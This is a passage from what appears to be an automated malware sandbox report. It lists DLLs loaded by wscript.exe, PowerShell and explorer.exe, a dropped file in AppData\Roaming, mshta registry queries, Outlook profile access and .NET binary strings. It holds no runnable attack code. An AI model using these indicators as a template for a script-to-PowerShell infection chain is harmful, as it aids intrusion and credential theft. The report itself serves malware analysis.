                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dll
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                Source: C:\Windows\explorer.exeSection loaded: webio.dll
                Source: C:\Users\user\AppData\Roaming\djvbaaeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\djvbaaeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\djvbaaeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\djvbaaeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\djvbaaeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\djvbaaeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1827828745.0000000007B00000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2163834487.000000000709A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105130224.00000000049D0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstu